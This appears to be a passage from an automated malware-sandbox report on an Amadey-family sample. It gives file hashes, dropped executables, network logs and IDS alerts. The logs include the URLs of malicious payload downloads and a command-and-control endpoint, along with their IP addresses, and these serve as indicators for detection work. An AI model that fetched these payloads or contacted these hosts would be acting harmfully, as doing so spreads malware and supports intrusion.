MD5:0A840A6FB5E22FB8D5292B6E00374DCB
SHA256:81D396898922A226CDB298845DA43F2529BED1E591DF2C611D66BBCDD43E98E7
7756TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXEC:\Users\admin\AppData\Local\Temp\c13dbdc4fa\saved.exeexecutable
MD5:F6C20A18AFEAC04964A6CCAD6BE59731
SHA256:CE75F9DEDE6D4E93549D35B816898113B6BEFAB9EF0AADF8949D4887C2C34BEA
7820saved.exeC:\Users\admin\AppData\Local\Temp\10055180101\2e92a12cfe.exeexecutable
MD5:0A840A6FB5E22FB8D5292B6E00374DCB
SHA256:81D396898922A226CDB298845DA43F2529BED1E591DF2C611D66BBCDD43E98E7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
212
TCP/UDP connections
191
DNS requests
75
Threats
85

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7536
powershell.exe
GET
200
185.39.17.162:80
http://185.39.17.162/testmine/random.exe
unknown
malicious
7820
saved.exe
POST
200
185.39.17.163:80
http://185.39.17.163/Su8kud7i/index.php
unknown
malicious
GET
304
172.202.163.200:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
6488
RUXIMICS.exe
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
8052
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
7820
saved.exe
POST
200
185.39.17.163:80
http://185.39.17.163/Su8kud7i/index.php
unknown
malicious
7820
saved.exe
GET
200
185.39.17.162:80
http://185.39.17.162/files/7244183739/AwFCMAP.exe
unknown
malicious
8052
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
GET
200
172.202.163.200:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
8052
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6488
RUXIMICS.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6488
RUXIMICS.exe
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
6488
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
7536
powershell.exe
185.39.17.162:80
Joint Stock Company Tagnet
RU
malicious
7820
saved.exe
185.39.17.163:80
Joint Stock Company Tagnet
RU
malicious

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.46
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
crl.microsoft.com
  • 2.19.11.105
  • 2.19.11.120
  • 2.16.164.113
  • 2.16.164.112
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
blockhubr.live
  • 104.21.32.232
  • 172.67.156.133
unknown
vecturar.top
  • 188.114.97.3
  • 188.114.96.3
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
7536
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 31
7536
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7536
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7536
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7536
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
7536
powershell.exe
Misc activity
ET INFO Packed Executable Download
7820
saved.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 31
7820
saved.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
7820
saved.exe
Malware Command and Control Activity Detected
ET MALWARE Amadey CnC Response
7820
saved.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer